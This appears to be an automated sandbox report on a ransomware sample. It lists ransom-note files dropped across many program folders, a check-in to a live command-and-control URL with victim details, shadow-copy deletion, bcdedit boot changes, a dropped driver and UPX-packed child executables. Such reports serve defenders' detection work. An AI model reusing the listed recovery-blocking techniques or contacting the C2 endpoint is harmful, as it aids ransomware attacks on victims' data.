DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\Install\{33958840-4836-4D50-B0D4-7D5C5BA25734}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{8abca515-e4a6-4e51-a601-d89f82310b22}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\odt\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe HTTP URL 301 http://sec.timerz.org/addrecord.php?apikey=drsc_api_key&compuser=LZUKLIOU|Admin&sid=T8kpEgGQuEOfCYqS&phase=[SHARES]6 Process not Found File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\prs-AF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\HoloShell_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Microsoft Office 15\ClientX64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1728 bcdedit.exe 5972 bcdedit.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS L5BjIoLQ64.exe -
Executes dropped EXE 136 IoCs
pid Process 2860 NWlShxDx.exe 4148 L5BjIoLQ.exe 4184 L5BjIoLQ64.exe 4328 L5BjIoLQ.exe 4380 L5BjIoLQ.exe 4512 L5BjIoLQ.exe 4536 L5BjIoLQ.exe 4700 L5BjIoLQ.exe 4724 L5BjIoLQ.exe 4864 L5BjIoLQ.exe 4884 L5BjIoLQ.exe 5112 L5BjIoLQ.exe 4120 L5BjIoLQ.exe 2064 L5BjIoLQ.exe 4332 L5BjIoLQ.exe 4500 L5BjIoLQ.exe 4556 L5BjIoLQ.exe 4744 L5BjIoLQ.exe 4624 L5BjIoLQ.exe 2156 L5BjIoLQ.exe 5084 L5BjIoLQ.exe 2424 L5BjIoLQ.exe 2428 L5BjIoLQ.exe 4192 L5BjIoLQ.exe 4464 L5BjIoLQ.exe 4680 L5BjIoLQ.exe 4732 L5BjIoLQ.exe 4892 L5BjIoLQ.exe 5064 L5BjIoLQ.exe 3704 L5BjIoLQ.exe 4196 L5BjIoLQ.exe 4504 L5BjIoLQ.exe 2180 L5BjIoLQ.exe 1044 L5BjIoLQ.exe 4600 L5BjIoLQ.exe 4492 L5BjIoLQ.exe 4336 L5BjIoLQ.exe 4960 L5BjIoLQ.exe 4656 L5BjIoLQ.exe 4940 L5BjIoLQ.exe 4560 L5BjIoLQ.exe 4920 L5BjIoLQ.exe 4868 L5BjIoLQ.exe 5044 L5BjIoLQ.exe 4788 L5BjIoLQ.exe 4340 L5BjIoLQ.exe 4156 L5BjIoLQ.exe 5104 L5BjIoLQ.exe 4784 L5BjIoLQ.exe 4392 L5BjIoLQ.exe 4736 L5BjIoLQ.exe 4288 L5BjIoLQ.exe 2364 L5BjIoLQ.exe 4564 L5BjIoLQ.exe 4584 L5BjIoLQ.exe 4228 L5BjIoLQ.exe 4820 L5BjIoLQ.exe 4636 L5BjIoLQ.exe 4524 L5BjIoLQ.exe 4308 L5BjIoLQ.exe 4128 L5BjIoLQ.exe 4924 L5BjIoLQ.exe 4260 L5BjIoLQ.exe 4900 L5BjIoLQ.exe 4232 L5BjIoLQ.exe 1760 L5BjIoLQ.exe 4816 L5BjIoLQ.exe 4780 L5BjIoLQ.exe 4704 L5BjIoLQ.exe 4632 L5BjIoLQ.exe 5136 L5BjIoLQ.exe 5264 L5BjIoLQ.exe 5284 L5BjIoLQ.exe 5412 L5BjIoLQ.exe 5436 L5BjIoLQ.exe 5572 L5BjIoLQ.exe 5592 L5BjIoLQ.exe 5720 L5BjIoLQ.exe 5740 L5BjIoLQ.exe 5868 L5BjIoLQ.exe 5892 L5BjIoLQ.exe 6020 L5BjIoLQ.exe 6044 L5BjIoLQ.exe 5144 L5BjIoLQ.exe 5088 L5BjIoLQ.exe 5188 L5BjIoLQ.exe 5180 L5BjIoLQ.exe 5328 L5BjIoLQ.exe 5532 L5BjIoLQ.exe 5668 L5BjIoLQ.exe 5712 L5BjIoLQ.exe 5876 L5BjIoLQ.exe 5856 L5BjIoLQ.exe 6008 L5BjIoLQ.exe 5960 L5BjIoLQ.exe 4100 L5BjIoLQ.exe 6072 L5BjIoLQ.exe 1720 L5BjIoLQ.exe 5380 L5BjIoLQ.exe 5472 L5BjIoLQ.exe 5504 L5BjIoLQ.exe 5844 L5BjIoLQ.exe 5884 L5BjIoLQ.exe 6060 L5BjIoLQ.exe 5920 L5BjIoLQ.exe 4420 L5BjIoLQ.exe 6128 L5BjIoLQ.exe 5260 L5BjIoLQ.exe 5348 L5BjIoLQ.exe 5332 L5BjIoLQ.exe 5568 L5BjIoLQ.exe 6032 L5BjIoLQ.exe 6016 L5BjIoLQ.exe 6092 L5BjIoLQ.exe 4776 L5BjIoLQ.exe 5420 L5BjIoLQ.exe 5256 L5BjIoLQ.exe 5424 L5BjIoLQ.exe 5864 L5BjIoLQ.exe 5640 L5BjIoLQ.exe 1196 L5BjIoLQ.exe 5352 L5BjIoLQ.exe 5164 L5BjIoLQ.exe 5612 L5BjIoLQ.exe 5484 L5BjIoLQ.exe 6104 L5BjIoLQ.exe 5124 L5BjIoLQ.exe 5204 L5BjIoLQ.exe 5636 L5BjIoLQ.exe 5768 L5BjIoLQ.exe 6108 L5BjIoLQ.exe 5904 L5BjIoLQ.exe 1244 L5BjIoLQ.exe 5544 L5BjIoLQ.exe 356 L5BjIoLQ.exe 5244 NWlShxDx.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\ResolveLimit.tiff 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000100000001ad6d-16.dat upx behavioral2/files/0x000100000001ad6d-17.dat upx behavioral2/files/0x000100000001ad6d-27.dat upx behavioral2/files/0x000100000001ad6d-29.dat upx behavioral2/files/0x000100000001ad6d-35.dat upx behavioral2/files/0x000100000001ad6d-37.dat upx behavioral2/files/0x000100000001ad6d-43.dat upx behavioral2/files/0x000100000001ad6d-45.dat upx behavioral2/files/0x000100000001ad6d-51.dat upx behavioral2/files/0x000100000001ad6d-53.dat upx behavioral2/files/0x000100000001ad6d-59.dat upx behavioral2/files/0x000100000001ad6d-61.dat upx behavioral2/files/0x000100000001ad6d-67.dat upx behavioral2/files/0x000100000001ad6d-69.dat upx behavioral2/files/0x000100000001ad6d-75.dat upx behavioral2/files/0x000100000001ad6d-77.dat upx behavioral2/files/0x000100000001ad6d-83.dat upx behavioral2/files/0x000100000001ad6d-85.dat upx behavioral2/files/0x000100000001ad6d-92.dat upx behavioral2/files/0x000100000001ad6d-95.dat upx behavioral2/files/0x000100000001ad6d-101.dat upx behavioral2/files/0x000100000001ad6d-103.dat upx behavioral2/files/0x000100000001ad6d-109.dat upx behavioral2/files/0x000100000001ad6d-111.dat upx behavioral2/files/0x000100000001ad6d-117.dat upx behavioral2/files/0x000100000001ad6d-119.dat upx behavioral2/files/0x000100000001ad6d-125.dat upx behavioral2/files/0x000100000001ad6d-127.dat upx behavioral2/files/0x000100000001ad6d-133.dat upx behavioral2/files/0x000100000001ad6d-135.dat upx behavioral2/files/0x000100000001ad6d-141.dat upx behavioral2/files/0x000100000001ad6d-143.dat upx behavioral2/files/0x000100000001ad6d-149.dat upx behavioral2/files/0x000100000001ad6d-151.dat upx behavioral2/files/0x000100000001ad6d-159.dat upx behavioral2/files/0x000100000001ad6d-161.dat upx behavioral2/files/0x000100000001ad6d-167.dat upx behavioral2/files/0x000100000001ad6d-169.dat upx behavioral2/files/0x000100000001ad6d-175.dat upx behavioral2/files/0x000100000001ad6d-177.dat upx behavioral2/files/0x000100000001ad6d-183.dat upx behavioral2/files/0x000100000001ad6d-185.dat upx behavioral2/files/0x000100000001ad6d-191.dat upx behavioral2/files/0x000100000001ad6d-193.dat upx behavioral2/files/0x000100000001ad6d-199.dat upx behavioral2/files/0x000100000001ad6d-201.dat upx behavioral2/files/0x000100000001ad6d-208.dat upx behavioral2/files/0x000100000001ad6d-210.dat upx behavioral2/files/0x000100000001ad6d-216.dat upx behavioral2/files/0x000100000001ad6d-218.dat upx behavioral2/files/0x000100000001ad6d-224.dat upx behavioral2/files/0x000100000001ad6d-227.dat upx behavioral2/files/0x000100000001ad6d-233.dat upx behavioral2/files/0x000100000001ad6d-235.dat upx behavioral2/files/0x000100000001ad6d-241.dat upx behavioral2/files/0x000100000001ad6d-243.dat upx behavioral2/files/0x000100000001ad6d-249.dat upx behavioral2/files/0x000100000001ad6d-251.dat upx behavioral2/files/0x000100000001ad6d-257.dat upx behavioral2/files/0x000100000001ad6d-259.dat upx behavioral2/files/0x000100000001ad6d-265.dat upx behavioral2/files/0x000100000001ad6d-267.dat upx behavioral2/files/0x000100000001ad6d-273.dat upx behavioral2/files/0x000100000001ad6d-275.dat upx behavioral2/files/0x000100000001ad6d-281.dat upx behavioral2/files/0x000100000001ad6d-283.dat upx behavioral2/files/0x000100000001ad6d-289.dat upx behavioral2/files/0x000100000001ad6d-291.dat upx behavioral2/files/0x000100000001ad6d-297.dat upx behavioral2/files/0x000100000001ad6d-299.dat upx behavioral2/files/0x000100000001ad6d-305.dat upx behavioral2/files/0x000100000001ad6d-307.dat upx behavioral2/files/0x000100000001ad6d-313.dat upx behavioral2/files/0x000100000001ad6d-315.dat upx behavioral2/files/0x000100000001ad6d-321.dat upx behavioral2/files/0x000100000001ad6d-323.dat upx behavioral2/files/0x000100000001ad6d-329.dat upx behavioral2/files/0x000100000001ad6d-331.dat upx behavioral2/files/0x000100000001ad6d-337.dat upx behavioral2/files/0x000100000001ad6d-339.dat upx behavioral2/files/0x000100000001ad6d-345.dat upx behavioral2/files/0x000100000001ad6d-347.dat upx behavioral2/files/0x000100000001ad6d-353.dat upx behavioral2/files/0x000100000001ad6d-355.dat upx behavioral2/files/0x000100000001ad6d-361.dat upx behavioral2/files/0x000100000001ad6d-363.dat upx behavioral2/files/0x000100000001ad6d-369.dat upx behavioral2/files/0x000100000001ad6d-371.dat upx behavioral2/files/0x000100000001ad6d-377.dat upx behavioral2/files/0x000100000001ad6d-379.dat upx behavioral2/files/0x000100000001ad6d-385.dat upx behavioral2/files/0x000100000001ad6d-387.dat upx behavioral2/files/0x000100000001ad6d-393.dat upx behavioral2/files/0x000100000001ad6d-395.dat upx behavioral2/files/0x000100000001ad6d-401.dat upx behavioral2/files/0x000100000001ad6d-403.dat upx behavioral2/files/0x000100000001ad6d-409.dat upx behavioral2/files/0x000100000001ad6d-411.dat upx behavioral2/files/0x000100000001ad6d-417.dat upx behavioral2/files/0x000100000001ad6d-419.dat upx behavioral2/files/0x000100000001ad6d-425.dat upx behavioral2/files/0x000100000001ad6d-427.dat upx behavioral2/files/0x000100000001ad6d-433.dat upx behavioral2/files/0x000100000001ad6d-435.dat upx 